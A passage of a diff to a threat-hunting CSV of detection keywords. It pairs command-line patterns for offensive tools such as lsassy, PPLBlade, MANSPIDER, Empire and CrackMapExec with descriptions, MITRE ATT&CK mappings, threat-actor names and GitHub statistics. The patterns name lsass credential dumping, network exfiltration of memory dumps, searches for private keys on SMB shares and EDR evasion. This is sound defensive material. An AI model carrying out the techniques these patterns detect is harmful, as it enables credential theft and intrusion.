Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"* --dump-gmsa*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* --dump-laps*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "* --dumpmode network --network raw --ip * --port *","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* --dumpmode network --network smb *","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" -"* --dump-name *lsass*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"* --dump-name *lsass*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "* --dumpname lsass.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* duplicates.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"* -e pfx p12 pkcs12 pem key crt cer csr jks keystore key keys der *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"* -e ppk rsa pem ssh rsa*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"* e2e_test.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* -e pfx p12 pkcs12 pem key crt cer csr jks keystore key keys der *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* -e ppk rsa pem ssh rsa*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* e2e_test.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* eap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ebowla.py*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "* edge logindata *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" @@ -556,40 +556,40 @@ "* edraser.py*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" "* EfsPotato*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* Egress-Assess's FTP server*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"* -ElevatedPersistenceOption *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -ElevatedPersistenceOption *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* emailall.py*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "* empire.arguments*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "* empire.client.*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "* empire.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"* empire_exec*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* empireadmin*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* empire_exec*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* empireadmin*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* -enabled -u * -p * -old-bloodhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* -encrypt * -process * -sandbox *","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","10","1333","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"* -encrypt * -process * -sandbox *","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "* enip-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* enum 127.0.0.1 *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"* enum 127.0.0.1 *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" "* enum -passive -d *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"* enum_avproducts*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* enum_chrome*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* enum_dns*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -Enumerate * -Module *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* --enum-local-admins*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* enum_avproducts*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* enum_chrome*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation 